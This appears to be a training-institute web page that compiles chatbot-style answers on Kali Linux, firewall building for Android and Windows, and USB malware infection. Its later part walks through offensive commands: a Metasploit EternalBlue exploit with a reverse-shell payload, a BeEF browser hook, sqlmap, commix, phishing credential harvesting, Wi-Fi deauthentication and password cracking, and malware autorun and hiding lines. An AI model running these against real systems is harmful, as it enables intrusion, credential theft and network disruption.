Kali Linux
https://www.istm.gov.in/home/user_datails/234
Kali Linux?
Kali Linux is a specialized Linux distribution used for ethical hacking, penetration testing, and cybersecurity research.Β
Other Tools like Kali Linux?
π οΈ Top OS Like Kali Linux:
Parrot OS β Lightweight and privacy-focused; includes hacking + anonymity tools.
BackBox β Ubuntu-based, designed for penetration testing and vulnerability assessment.
BlackArch Linux β Arch-based distro with 2,800+ hacking tools.
Pentoo β Gentoo-based, focused on penetration testing and security auditing.
DEFT Linux β Focused on digital forensics and incident response.
NST (Network Security Toolkit) β Fedora-based, for network security analysis.
CAINE β Specifically for computer forensics and data recovery.
Each has its own strengths β but Kali and Parrot OS are the most widely used for offensive security.
What is Modus operandi and Security tips and techniques?
πΉ What is Modus Operandi?
Modus Operandi (MO) is a Latin term that means "method of operation."
In security and crime-related contexts, it refers to:
The specific way or pattern in which a crime or security breach is typically committed.
It includes:
Techniques used by criminals or attackers
Tools or technologies employed
Behavioral patterns and target selection
Timing, location, and method of execution
π Understanding the MO helps in anticipating, detecting, and preventing future threats.
πΉ Security Tips and Techniques
Here are common security tips and techniques (especially for cyber and physical security):
π 1. Password Safety
Use strong, unique passwords
Enable 2-factor authentication
Avoid sharing passwords
π 2. Internet Safety
Avoid clicking on unknown links/emails
Use HTTPS websites only
Clear browsing data regularly
π» 3. Device Protection
Install antivirus and keep it updated
Use firewalls
Lock screen when not in use
π§βπΌ 4. Social Engineering Awareness
Donβt share sensitive info over calls/emails
Verify identity before responding
Be cautious of phishing or impersonation
π 5. Data Security
Backup data regularly
Encrypt sensitive files
Follow access control policies
π’ 6. Physical Security
Use ID cards, biometric access
Monitor CCTV regularly
Keep entry-exit logs for visitors
π 7. Incident Reporting
Report suspicious activity immediately
Maintain a security incident register
π§ 8. Awareness and Training
Conduct regular awareness sessions
Simulated drills (cyber/physical threats)
Promote a "security-first" culture
How to create own firewall android?
π§ How to Create Your Own Firewall (Android Focus)
β Option 1: Build Your Own Firewall App for Android (No Root)
You can build a firewall app using Androidβs VPNService API, which lets you create a local VPN tunnel and filter traffic.
π οΈ Tools Needed:
Android Studio
Java or Kotlin
Basic understanding of Android app development
Permissions: BIND_VPN_SERVICE, INTERNET, etc.
π What Your App Will Do:
Intercept traffic using VPNService
Filter or block traffic based on app, IP, port, or domain
Allow or deny connections
Optionally log traffic
π Guide (Steps in Short):
Create a VPNService subclass
Override establish() to set up tunnel
Use ParcelFileDescriptor to capture traffic
Parse packets (optional: use a library like Pcap4J)
Add filtering rules based on user input
Forward allowed packets to destination
Block or drop others
β
What is a Rooted Device? (In Simple Terms)
A rooted Android device means:
You have full control over your phone β like the "admin" or "owner" of everything inside it.
π§βπΎ Farmer Example:
Imagine your phone is a tractor.
Normally, youβre only allowed to drive it and change a few settings.
But you canβt open the engine, change deep parts, or install powerful tools.
When you root it, itβs like getting the master key to open up everything:
You can modify the engine
Remove built-in parts
Add new, custom parts
Do things the company usually doesnβt allow
π Root = Unlocking full access
It removes the restrictions put by the manufacturer (like Samsung, Vivo, etc.)
You can now:
Install special apps
Change system files
Control the whole device like a hacker or developer
β οΈ But Be Careful:
Rooting can void warranty
You might break the phone if something goes wrong
Can make your device less secure if not managed properly
So in short:
Rooting = Getting full control of your phone, like becoming the βbossβ of it.
π§βπ» Option 2: Create Firewall Rules on a Rooted Device (Linux-like iptables)
If your Android is rooted:
Use iptables (Linux command-line firewall system)
Write your own firewall rules (e.g., block a certain IP, port, or app UID)
Automate with shell scripts or Termux
Example:
bash
CopyEdit
iptables -A OUTPUT -p tcp --dport 80 -j DROP
π Option 3: Create a Firewall at Network Level (Router / Raspberry Pi)
Set up a Raspberry Pi or old PC with Linux
Install iptables, UFW, or pfSense
Connect all devices through that router/firewall
Control/block traffic network-wide
β οΈ Things to Keep in Mind:
Custom firewalls need deep packet inspection if you're doing advanced filtering
VPN-based firewalls wonβt work simultaneously with commercial VPNs
Be mindful of battery and performance issues if running real-time traffic filters
β Summary:
Platform = Way to Build Firewall
Android (no root) = Use VPNService API (Java/Kotlin app)
Android (rooted) = Use iptables
Laptop/Desktop = Use UFW, Windows Firewall, or write custom scripts
Network-wide = Set up a Raspberry Pi or pfSense box
π± Android Firewall App (No Root Needed)
π§ Tools Needed:
Android Studio
Java or Kotlin
API Level 21+
𧩠Step-by-Step Code (Basic VPNService-based Firewall)
π 1. AndroidManifest.xml
xml
CopyEdit
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
Β Β Β Β package="com.example.firewall">
Β Β Β Β <application
Β Β Β Β Β Β Β Β android:allowBackup="true"
Β Β Β Β Β Β Β Β android:label="Firewall"
Β Β Β Β Β Β Β Β android:supportsRtl="true"
Β Β Β Β Β Β Β Β android:theme="@style/Theme.AppCompat.Light.DarkActionBar">
Β Β Β Β Β Β Β Β
Β Β Β Β Β Β Β Β <service
Β Β Β Β Β Β Β Β Β Β Β Β android:name=".MyVPNService"
Β Β Β Β Β Β Β Β Β Β Β Β android:permission="android.permission.BIND_VPN_SERVICE">
Β Β Β Β Β Β Β Β Β Β Β Β <intent-filter>
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β <action android:name="android.net.VpnService" />
Β Β Β Β Β Β Β Β Β Β Β Β </intent-filter>
Β Β Β Β Β Β Β Β </service>
Β Β Β Β </application>
</manifest>
π§ 2. Create MyVPNService.java
java
CopyEdit
import android.net.VpnService;
import android.os.ParcelFileDescriptor;
import java.io.IOException;
public class MyVPNService extends VpnService {
Β Β Β Β private ParcelFileDescriptor vpnInterface;
Β Β Β Β @Override
Β Β Β Β public void onCreate() {
Β Β Β Β Β Β Β Β super.onCreate();
Β Β Β Β Β Β Β Β startVPN();
Β Β Β Β }
Β Β Β Β private void startVPN() {
Β Β Β Β Β Β Β Β Builder builder = new Builder();
Β Β Β Β Β Β Β Β builder.setSession("MyFirewallVPN")
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β .addAddress("10.0.0.2", 32)Β // Virtual IP
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β .addRoute("0.0.0.0", 0); Β Β // Route all traffic
Β Β Β Β Β Β Β Β try {
Β Β Β Β Β Β Β Β Β Β Β Β vpnInterface = builder.establish();
Β Β Β Β Β Β Β Β } catch (Exception e) {
Β Β Β Β Β Β Β Β Β Β Β Β e.printStackTrace();
Β Β Β Β Β Β Β Β }
Β Β Β Β }
Β Β Β Β @Override
Β Β Β Β public void onDestroy() {
Β Β Β Β Β Β Β Β super.onDestroy();
Β Β Β Β Β Β Β Β try {
Β Β Β Β Β Β Β Β Β Β Β Β if (vpnInterface != null) {
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β vpnInterface.close();
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β vpnInterface = null;
Β Β Β Β Β Β Β Β Β Β Β Β }
Β Β Β Β Β Β Β Β } catch (IOException e) {
Β Β Β Β Β Β Β Β Β Β Β Β e.printStackTrace();
Β Β Β Β Β Β Β Β }
Β Β Β Β }
}
𧩠3. Add Permissions in AndroidManifest.xml
xml
CopyEdit
<uses-permission android:name="android.permission.INTERNET" />
ποΈ 4. Trigger the VPN Service from MainActivity
java
CopyEdit
import android.content.Intent;
import android.net.VpnService;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
public class MainActivity extends AppCompatActivity {
Β Β Β Β private static final int VPN_REQUEST_CODE = 0x0F;
Β Β Β Β @Override
Β Β Β Β protected void onCreate(Bundle savedInstanceState) {
Β Β Β Β Β Β Β Β super.onCreate(savedInstanceState);
Β Β Β Β Β Β Β Β Intent intent = VpnService.prepare(this);
Β Β Β Β Β Β Β Β if (intent != null) {
Β Β Β Β Β Β Β Β Β Β Β Β startActivityForResult(intent, VPN_REQUEST_CODE);
Β Β Β Β Β Β Β Β } else {
Β Β Β Β Β Β Β Β Β Β Β Β onActivityResult(VPN_REQUEST_CODE, RESULT_OK, null);
Β Β Β Β Β Β Β Β }
Β Β Β Β }
Β Β Β Β @Override
Β Β Β Β protected void onActivityResult(int requestCode, int resultCode, Intent data) {
Β Β Β Β Β Β Β Β if (requestCode == VPN_REQUEST_CODE && resultCode == RESULT_OK) {
Β Β Β Β Β Β Β Β Β Β Β Β Intent intent = new Intent(this, MyVPNService.class);
Β Β Β Β Β Β Β Β Β Β Β Β startService(intent);
Β Β Β Β Β Β Β Β }
Β Β Β Β Β Β Β Β super.onActivityResult(requestCode, resultCode, data);
Β Β Β Β }
}
β What This Code Does:
Creates a dummy VPN interface
Routes all traffic through it
Doesnβt filter yet β you can build filtering logic using packet inspection libraries (like Pcap4J, jNetPcap)
β οΈ Next Steps (Advanced):
Add traffic filtering by IP/domain
Use selectors to allow/block traffic per app
Log and display data usage per app
Build a UI with toggles for each app
π£ Your Goal:
To create a basic Android firewall app that uses code.
π§° What You Need First:
β 1. A Computer (Windows or macOS)
Thatβs where youβll write the app.
β 2. Android Studio
Android Studio is like the kitchen where youβll "cook" your app (code, run, test it).
π½ Step 1: Install Android Studio
Download & install it (it's free).
Open it β it might take a few minutes to set up.
π Step 2: Create a New Android Project
Click "New Project"
Choose "Empty Activity"
Name your app: e.g., MyFirewallApp
Language: Choose Java
Click Finish
Now Android Studio will create a basic app project for you. Think of it like the empty pot where you'll add your ingredients (your code).
π Step 3: Where to Paste the Codes I Gave You
You will see folders like:
css
CopyEdit
app >
Β Β Β Β java >
Β Β Β Β Β Β Β Β com.example.myfirewallapp >
Β Β Β Β Β Β Β Β Β Β Β Β MainActivity.java β (Paste MainActivity code here)
Double-click MainActivity.java
Replace everything inside it with the code I gave for MainActivity
Next:
scss
CopyEdit
Right-click the same folder (com.example...) β New β Java Class β Name it MyVPNService
Paste the code for MyVPNService.java here.
Now:
π Open AndroidManifest.xml
Youβll find it here:
nginx
CopyEdit
app > manifests > AndroidManifest.xml
Add the permissions and service code I gave you there.
βΆοΈ Step 4: Run the App on a Phone or Emulator
β You can either:
Connect your Android phone via USB (Enable "Developer Options" and "USB Debugging")
Or use the built-in Emulator in Android Studio
Then click the green Play button (βΆοΈ) to launch your app.
π§ͺ Step 5: Test the VPN
The app will ask for permission to create a VPN connection
Tap "Allow"
Now your app starts routing traffic β your firewall foundation is ready!
β Where to Install Android Studio?
π Install it on your laptop or PC.
π» NOT on your Android phone.
π½ Step-by-step Installation on Laptop:
Go to this link on your laptop:
π https://developer.android.com/studioClick the big βDownload Android Studioβ button
Agree to terms β Download starts
Once the .exe (for Windows) or .dmg (for Mac) file is downloaded:
Open the file
Click Next β Next β Install
After installation, open Android Studio
π― What Android Studio Does:
It gives you the full tools to create Android apps
You write and test your firewall app on your laptop
Then you install it (run it) on your Android phone
𧩠Summary:
Question - Answer
Where to install Android Studio? - π» On your laptop
Can I install it on Android phone? - β No, not possible
What do I do after installation? - β Create your app and test it on phone
π’ What is F-Droid?
F-Droid is like a Play Store β but for free and open-source apps only.
β It's a place where you can download Android apps that are:
Free of cost
Open-source (you can see and check the code)
No ads, no tracking, no spying
Often useful for techies, developers, ethical hackers, and privacy-conscious users
π οΈ Where did F-Droid come from?
It was started by the F-Droid community in 2010
It is maintained by independent developers and privacy advocates
Itβs not controlled by Google, which makes it very different from Play Store
πͺ Whatβs inside F-Droid?
Apps like:
π Privacy tools (NetGuard, TrackerControl)
π§βπ» Developer tools (Termux, packet sniffers)
π± Root tools (AFWall+, OpenVPN, firewall apps)
π§ββοΈ Minimal apps (lightweight browsers, note apps, etc.)
β Why Use F-Droid?
Feature = F-Droid = Play Store
Ads - β No adsΒ - β Many apps have ads
Trackers - β No spying - β οΈ Some apps track you
Source Code - β Open-source - β Not available
Root Tools - β Many available - β Often banned
Free AppsΒ -Β Totally free - β οΈ Some paid, some free
π½ How to Install F-Droid?
β οΈ You wonβt find F-Droid on the Play Store (Google doesn't allow it!)
β Steps:
On your phone, open any browser
Go to π https://f-droid.org
Download the F-Droid APK
When asked, allow βInstall from unknown sourcesβ
Install and open F-Droid
Browse and install apps like Termux, AFWall+, etc.
π§ Analogy:
Think of F-Droid as a local organic market β everything is clean, open, and safe β compared to a big supermarket (Play Store) that sells both healthy and junk stuff with ads everywhere.
𧩠What is iptables?
π iptables is a firewall command-line tool used in Linux systems (including Android, because Android is built on Linux!).
It helps you:
Block or allow internet for apps
Control incoming and outgoing network traffic
Protect the system by setting rules
π‘ Think of it like this:
iptables is like a digital traffic policeman.
You write rules like:
"Let Chrome go online" β
"Block WhatsApp from internet" β
"Stop all outgoing traffic" π«
π οΈ Where do you run iptables?
β You run it on your Android phone
(but only if it is rooted β)
Not on your laptop.
π± Tools to run iptables on phone:
πΉ 1. Termux App (from F-Droid, not Play Store)
A terminal app (like command prompt for Android)
You type commands in it
Works like a mini Linux on your phone
πΉ 2. Root Terminal App
Any terminal that allows su (superuser) command
You need to grant root permission when asked
π§ͺ Example Step-by-Step (on rooted phone):
Install Termux from https://f-droid.org/
Open Termux
Type this command to get root access:
bash
CopyEdit
su
(Your phone will ask: "Grant Root Access?" β tap ALLOW)
Now you can use iptables commands like:
bash
CopyEdit
iptables -P OUTPUT DROPΒ # block all outgoing traffic
or:
bash
CopyEdit
iptables -A OUTPUT -m owner --uid-owner 10123 -j ACCEPT
(Allow traffic only for an app with UID 10123)
β οΈ Remember:
You are doing powerful system-level stuff, so be cautious
These commands only work if your device is rooted
After rebooting, rules go away unless you save them or use a firewall app like AFWall+
π Optional Easy Way:
If you're not comfortable typing commands, install AFWall+ and just check/uncheck boxes to allow or block apps.
π¬ TL;DR:
Question - Answer
What is iptables? - A Linux firewall command system
Where to run it? - On rooted Android phone using apps like Termux
Can I run it on laptop? - β No, not for controlling your phone's internet
Is there an easy way? - β Yes! Use AFWall+ app instead
β What You Can Do on a Rooted Device (Firewall-wise):
π₯ Option 1: Use iptables to Create Your Own Firewall Rules
This is like writing your own firewall script β the same as a Linux computer.
π§° What You Need:
A rooted Android device
A terminal app (like Termux or a Root-enabled Terminal Emulator)
Superuser (root) access
BusyBox (optional but helpful)
π§Ύ Example iptables Commands:
π Block all outgoing internet:
bash
CopyEdit
su
iptables -P OUTPUT DROP
π Allow only browser (say Chrome) to use internet:
First, find Chrome's UID:
bash
CopyEdit
dumpsys package com.android.chrome | grep userId=
Assume it shows UID: 10123
Now allow only Chrome:
bash
CopyEdit
iptables -A OUTPUT -m owner --uid-owner 10123 -j ACCEPT
π Block WhatsApp from internet:
Find UID of WhatsApp:
bash
CopyEdit
dumpsys package com.whatsapp | grep userId=
Then:
bash
CopyEdit
iptables -A OUTPUT -m owner --uid-owner <WhatsApp_UID> -j DROP
β οΈ Important:
These rules reset after reboot. To make them permanent, use init.d scripts, firewall apps for rooted phones, or write a boot script.
Be careful β blocking the wrong UID might break important apps.
π Alternative: Use a Firewall App for Rooted Devices
πΉ AFWall+ (Android Firewall Plus)
Free app from Play Store or F-Droid
Uses iptables in background
Easy UI to block internet per app (Wi-Fi/data)
π‘ Tip: After installing AFWall+, grant root access, then simply toggle apps to block/allow internet.
π Summary:
Option - Tool - Skill Level
Write your own firewall - iptables in Termux -Β - IntermediateβAdvanced
Easy UI method - AFWall+ = BeginnerβFriendly
How to create own firewall in Windows?
π§° What does βCreate Own Firewallβ mean in Windows?
It means youβll:
Control which apps can access internet
Block incoming or outgoing connections
Set custom rules to protect your computer from hackers or leaks
β 3 Ways to Create Your Own Firewall in Windows:
πΉ Method 1: Use Built-in Windows Defender Firewall
Windows already comes with a powerful firewall, and you can create custom rules in it β no need to install anything.
π£ Steps to Create Custom Firewall Rules:
Search "Windows Defender Firewall" in Start Menu
Click βAdvanced Settingsβ on the left side
This opens Windows Firewall with Advanced Security
Now, youβll see:
Inbound Rules β For connections coming into your computer
Outbound Rules β For connections leaving your computer
π« Example: Block an App from Using Internet
Letβs say you want to block Chrome:
Click Outbound Rules > New Rule (on right side)
Select Program > Next
Browse and select the app you want to block (e.g., chrome.exe)
Choose Block the connection > Next
Select all profiles (Domain, Private, Public) > Next
Name it βBlock Chromeβ > Finish β
π Done! Chrome can no longer access the internet.
πΉ Method 2: Use PowerShell to Create Firewall Rules
If you love command-line:
powershell
CopyEdit
New-NetFirewallRule -DisplayName "Block Chrome" -Direction Outbound -Program "C:\Program Files\Google\Chrome\Application\chrome.exe" -Action Block
This does the same as above β but faster.
πΉ Method 3: Build Your Own Firewall App (Advanced)
If youβre a developer (or learning):
Use languages like Python, C#, or C++
Use Windows Filtering Platform (WFP) APIs
Or use WinDivert β a Windows packet capture/divert library
But this is very advanced and not needed unless you're building a full custom product.
π§ Summary:
Goal = Method
Block internet for apps = Use Windows Firewall Advanced Settings
Do it with commands = Use PowerShell
Build full custom firewall = Use C#/C++ + WinDivert or WFP (Advanced)
πΉ Method 1: PowerShell Script (No Software Needed)
Use this if you want to quickly block or allow apps from accessing the internet.
π§Ύ Code 1: Block an App from Accessing Internet
π Example: Block Chrome from using the internet
powershell
CopyEdit
New-NetFirewallRule -DisplayName "Block Chrome Outbound" `
Β Β Β Β -Direction Outbound `
Β Β Β Β -Program "C:\Program Files\Google\Chrome\Application\chrome.exe" `
Β Β Β Β -Action Block
π§Ύ Code 2: Allow Specific App Only (Block All Others)
You can first block everything and then allow specific apps:
powershell
CopyEdit
# Block all outbound traffic (β οΈ Be careful!)
Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultOutboundAction Block
# Allow Notepad
New-NetFirewallRule -DisplayName "Allow Notepad" `
Β Β Β Β -Direction Outbound `
Β Β Β Β -Program "C:\Windows\System32\notepad.exe" `
Β Β Β Β -Action Allow
β To undo, run:
powershell
CopyEdit
Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultOutboundAction Allow
π How to Use This:
Press Start β search βPowerShellβ β Run as Administrator
Paste the above code and hit Enter
Done! Youβve created a firewall rule π
πΉ Method 2: Python Script (Advanced Custom Firewall)
You can also capture and analyze packets using Python + pydivert (a wrapper for WinDivert).
π¦ Install pydivert:
bash
CopyEdit
pip install pydivert
π Python Example: Block Access to Specific Website (e.g., Facebook)
python
CopyEdit
import pydivert
with pydivert.WinDivert("outbound and ip.DstAddr == 157.240.0.0/16") as w:Β # Facebook IP Range
Β Β Β Β for packet in w:
Β Β Β Β Β Β Β Β print("Blocked:", packet.dst_addr)
Β Β Β Β Β Β Β Β # Drop the packet = block it (do not re-inject)
This will block outbound traffic to Facebook's IP range.
β οΈ Run as Administrator (script needs admin rights to work).
π§ Summary:
Task = Tool = Code Type
Block an app (e.g., Chrome) = PowerShell = β Simple & Recommended
Block websites/IPs = Python + pydivert = π§ Advanced
Custom rule-based blocking = C#/C++ with WinDivert/WFP = π¨βπ» Expert Level
How USB detected onto computer?
𧩠π What Happens When You Plug an Unknown USB Pen Drive into a Windows PC
β STEP 1: Electrical Detection (Hardware Level)
You insert the USB pen drive into the port.
The motherboard's USB controller sends a signal to the Windows kernel: βHey, something new is connected!β
β STEP 2: Device Enumeration
Windows checks what kind of device is connected using Plug and Play (PnP).
It reads the deviceβs Vendor ID, Product ID, and Device Class.
If drivers are already available, it installs automatically (usually silently in seconds).
β STEP 3: File System Mounting
Windows sees the USB as a storage device (Disk Drive class).
It checks the file system (FAT32, exFAT, NTFS, etc.)
If itβs valid, it assigns a drive letter (like E:\ or F:)
π This is when you hear the "ding" sound, and the USB becomes visible.
β STEP 4: AutoPlay / AutoRun
Windows looks for a file called autorun.inf on the drive.
This file can tell Windows: βOpen this file or app automatically.β
β οΈ AutoRun is disabled by default in modern Windows (for security), but older PCs or misconfigured systems may still allow it. Thatβs how viruses can launch automatically.
β STEP 5: File Explorer Shows the Drive
The explorer.exe process (your file browser) updates the drive list.
You now see the USB in "This PC" and can click to open it.
π¦ Now If a Virus Is Presentβ¦
Hereβs how a virus might sneak in:
β οΈ STEP 6: AutoRun Attack (If Enabled)
If AutoRun is on, a file like malware.exe is automatically executed.
This could be a keylogger, ransomware, worm, or backdoor.
Example autorun.inf content:
ini
CopyEdit
[autorun]
open=malware.exe
β οΈ STEP 7: Manual Trigger (If You Click Something)
Even if AutoRun is off, you might double-click an infected file (e.g., PDF, EXE, DOC with macros).
Boom π₯ β virus activates.
π Where Does the Virus Go After Entry?
𧬠STEP 8: Virus Copies Itself (Persistence)
It may store itself in:
Startup Folder
C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Registry (auto start entry)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
System Folders (hidden)
C:\Windows\System32
C:\Users\<Username>\AppData\Local\Temp
Scheduled Tasks
Creates hidden tasks to auto-run on boot
ποΈβπ¨οΈ How It Hides Itself:
Renames itself like βsvchost.exeβ to look like a system file
Hides with attributes: attrib +h +s +r malware.exe
Runs in background silently
π How to Detect It:
Use Task Manager or Process Explorer
Use tools like Autoruns (by Sysinternals)
Scan with good antivirus or Windows Defender Offline Scan
π Summary Flow:
pgsql
CopyEdit
Plug USB β Detected by USB controller β Windows loads driver β Mounts file system β AutoRun checked β File Explorer shows drive β Virus may auto-run or be clicked β Virus copies itself to system folders/startup β Tries to hide and run at boot
π‘οΈ Pro Tips to Stay Safe:
Disable AutoRun (usually already disabled in Win 10/11)
Never run unknown EXE files from a USB
Always scan USB with antivirus first
Keep βshow hidden filesβ ON to spot suspicious content
How many commands are there in Kali Linux?
π’ So, how many commands are there in Kali Linux (for hacking tools)?
Kali Linux includes:
600+ pre-installed tools
Each tool typically has multiple commands, flags, or usage options
β On average, each tool can have 10β50+ commands or options.
β‘οΈ So, roughly:
600 tools Γ average 20 commands = 12,000+ possible hacking-related commands
This doesnβt even count the standard Linux commands, which are also used for scripting, networking, and automation.
π§ Example:
nmap β 30+ common command variations
metasploit (msfconsole) β 1000s of modules (each a command)
aircrack-ng β 10β15 core commands
sqlmap β dozens of flags for different attack vectors
π£ 1. Metasploit Framework
A big toolkit for finding and exploiting vulnerabilities in a target system.
π§Ύ Code:
bash
CopyEdit
msfconsole
π What it does:
Starts the Metasploit console β the main interface where you type all commands.
π§Ύ Sample Exploit:
bash
CopyEdit
use exploit/windows/smb/ms17_010_eternalblue
π What it does:
Loads an exploit that targets a Windows vulnerability called EternalBlue, used in real attacks like WannaCry.
bash
CopyEdit
set RHOSTS <target_ip>
π What it does:
Sets the IP address of the victim machine you want to attack.
bash
CopyEdit
set LHOST <your_ip>
π What it does:
Sets your own IP address β so when the victim is hacked, it knows where to send access back (reverse shell).
bash
CopyEdit
set PAYLOAD windows/meterpreter/reverse_tcp
π What it does:
Tells Metasploit what kind of "weapon" to use. In this case: a reverse shell, which gives you control of the victimβs machine.
bash
CopyEdit
run
π What it does:
Launches the attack. If successful, youβll get access to the victimβs computer.
π 2. BeEF (Browser Exploitation Framework)
Used to hack/control someoneβs browser when they click a malicious link.
π§Ύ Code:
bash
CopyEdit
beef-xss
π What it does:
Starts the BeEF server. You use this to trap browsers that visit your fake web page.
π§Ύ Hook Example:
html
CopyEdit
<script src="http://your_ip:3000/hook.js"></script>
π What it does:
When a victim opens a page with this code, their browser gets hooked β meaning, you can now control their browser from your BeEF panel (e.g., pop-ups, steal cookies, redirect, etc.)
π‘ 3. RouterSploit
Like Metasploit, but made to hack routers and IoT devices (CCTV, smart TVs, etc.)
π§Ύ Code:
bash
CopyEdit
rsf
π What it does:
Starts RouterSploit's console.
bash
CopyEdit
use scanners/autopwn
π What it does:
Loads the module that automatically scans routers for known weaknesses.
bash
CopyEdit
set target <router_ip>
run
π What it does:
Targets the router at that IP and checks if itβs vulnerable to attacks.
π’οΈ 4. sqlmap
Tool to hack into databases behind websites using SQL injection.
π§Ύ Code:
bash
CopyEdit
sqlmap -u "http://target.com/product.php?id=1" --dbs
π What it does:
-u: URL of the vulnerable page
--dbs: Tells sqlmap to list the databases if the site is vulnerable
If it works, you can read data like usernames, passwords, etc.
π 5. Commix
Used for command injection attacks β when a web app executes system commands without permission.
π§Ύ Code:
bash
CopyEdit
commix --url="http://target.com/index.php?name=test" --data="name=test"
π What it does:
Tests if you can inject system commands through the "name" field (like running ls, whoami, etc.) on the target's server.
π 6. SET (Social Engineering Toolkit)
Used to trick people (phishing) to give up passwords, or click fake websites.
π§Ύ Code:
bash
CopyEdit
setoolkit
π What it does:
Starts the Social Engineering Toolkit, an interactive menu tool.
Then you'd follow this path:
text
CopyEdit
1) Social-Engineering AttacksΒ Β
2) Website Attack VectorsΒ Β
3) Credential Harvester Attack Method
It creates a fake login page (like Facebook), and when the victim enters their password β you get it.
π 7. SearchSploit
Finds public exploit code from the Exploit Database (offline).
π§Ύ Code:
bash
CopyEdit
searchsploit apache struts
π What it does:
Searches for exploits related to Apache Struts (a common web app framework).
π§Ύ To copy an exploit:
bash
CopyEdit
searchsploit -m linux/local/37292.c
π What it does:
Copies that exploit code into your working folder so you can compile and use it.
β In Summary (Plain Language):
Tool = What It Does
Metasploit = Launches real system attacks (full control)
BeEF = Controls browser (like remote puppet)
RouterSploit = Hacks routers, cameras, IoT
sqlmap = Steals data from website databases
Commix = Runs system commands through web inputs
SET = Creates fake websites to trick users
SearchSploit = Lets you search and download real exploit codes
WiFi exploitation examples?
π¨ Important Disclaimer:
Use Wi-Fi exploitation tools only on networks you own or have permission to test. Unauthorized use is illegal and unethical.
π§° Tools for Wi-Fi Exploitation in Kali Linux:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
wash and reaver (for WPS attacks)
wifite (automated Wi-Fi attack tool)
Fluxion (social engineering-based Wi-Fi phishing)
π§ STEP-BY-STEP WIFI EXPLOITATION CODES
β Step 1: Put Wi-Fi Adapter in Monitor Mode
bash
CopyEdit
sudo airmon-ng start wlan0
π What it does: Enables monitor mode on your Wi-Fi card so it can "listen" to all traffic nearby (not just your network).
β οΈ Replace wlan0 with your adapter name if different (iwconfig to check)
β Step 2: Scan Nearby Wi-Fi Networks
bash
CopyEdit
sudo airodump-ng wlan0mon
π What it does: Shows nearby networks, BSSIDs (MAC addresses), channels, and client devices.
Note down the BSSID and channel of your target Wi-Fi network.
β Step 3: Target a Specific Network
bash
CopyEdit
sudo airodump-ng --bssid <router_bssid> -c <channel> -w capture wlan0mon
π What it does:
Targets a specific router
Captures handshake packets (needed to crack password)
Saves data to a file (capture.cap)
β Step 4: Deauthenticate a Client to Capture Handshake
bash
CopyEdit
sudo aireplay-ng --deauth 10 -a <router_bssid> -c <client_mac> wlan0mon
π What it does:
Sends fake disconnect signals to the user β when they reconnect, you capture the handshake (Wi-Fi password exchange).
β Step 5: Crack the Wi-Fi Password
bash
CopyEdit
sudo aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt
π What it does:
Uses a wordlist (like rockyou.txt) to try different passwords and crack the captured handshake file.
π BONUS: Use Wifite for Automated Attacks
bash
CopyEdit
sudo wifite
π What it does:
Scans and attacks Wi-Fi networks automatically using tools above (airodump, aircrack, etc.)
π§ BONUS TOOL: Reaver (For WPS Attacks)
If the router has WPS enabled, try this:
bash
CopyEdit
sudo wash -i wlan0mon
π Shows WPS-enabled routers.
bash
CopyEdit
sudo reaver -i wlan0mon -b <bssid> -c <channel> -vv
π Tries to brute-force the WPS PIN and get the Wi-Fi password.
π¦ Summary of Commands:
Tool = Β Command = What It Does
airmon-ng = airmon-ng start wlan0 = Enable monitor mode
airodump-ng = airodump-ng wlan0mon = Scan Wi-Fi networks
airodump-ng (target) = airodump-ng --bssid BSSID -c CH -w capture wlan0mon = Capture handshake
aireplay-ng = aireplay-ng --deauth 10 -a BSSID -c CLIENT wlan0mon = Force reconnect
aircrack-ng = aircrack-ng capture.cap -w rockyou.txt = Crack password
wifite = wifite = Auto-attack Wi-Fi
reaver = reaver -i wlan0mon -b BSSID -vv = Brute-force WPS
sudo apt update && sudo apt upgrade -y
sudo apt update && sudo apt upgrade -yΒ
The command sudo apt update && sudo apt upgrade -y is commonly used in Debian-based Linux distributions like Kali Linux to update and upgrade the system. Here's the breakdown:
1. sudo (Super User Do):
Purpose: Runs the command with superuser (root) privileges because installing, updating, or modifying system files requires administrative rights.
Why Needed: Normal users donβt have permission to make system-wide changes. sudo temporarily grants that power.
2. apt (Advanced Package Tool):
Purpose: This is the package manager used in Debian-based systems to handle software installation, updates, and removal.
Think of it as: The "app store" for Linux, but controlled via the terminal.
3. update:
Purpose: This command tells apt to fetch the latest information about available software packages from online repositories (servers).
What It Does:
Downloads updated lists of available software and their versions.
Does NOT install anything yetβjust updates the list.
Analogy: Itβs like refreshing the page to see if new apps are available in an app store.
4. && (Logical AND Operator):
Purpose: Allows you to chain commands together.
How It Works:
Runs the command on the left (sudo apt update).
Only if the first command succeeds, it runs the command on the right (sudo apt upgrade -y).
Why Useful: Ensures you donβt upgrade outdated package lists. It prevents unnecessary errors.
5. upgrade:
Purpose: Installs the latest versions of all the packages currently installed on your system based on the updated package list from apt update.
What It Does:
Downloads and installs newer versions of software if available.
Keeps your system secure with the latest patches.
Key Point: It does NOT remove old packagesβit only upgrades existing ones.
6. -y (Yes to All Prompts):
Purpose: Automatically answers "yes" to all prompts that usually ask for confirmation during the upgrade.
Why Useful: Makes the process unattended, especially helpful when automating updates.
Without -y: The system would stop and ask:
"Do you want to continue? [Y/n]"
Complete Workflow:
sudo apt update β Refreshes the list of software.
&& β Ensures the next step only runs if the update succeeded.
sudo apt upgrade -y β Installs all available updates automatically without asking for confirmation.
Cybersecurity Tips & Techniques for Experts
π Cybersecurity Tips & Techniques for Experts
π§ 1. Defense-in-Depth (Layered Security)
Apply security at every layer: network, endpoint, application, and data.
Implement network segmentation, micro-segmentation, and least privilege access.
π΅οΈ 2. Zero Trust Architecture (ZTA)
Never trust, always verifyβeven within internal networks.
Continuously validate user identity, device health, and access policies.
Use tools like Microsoft Defender for Identity, Okta, or ZScaler ZTA solutions.
𧱠3. Endpoint Detection and Response (EDR)
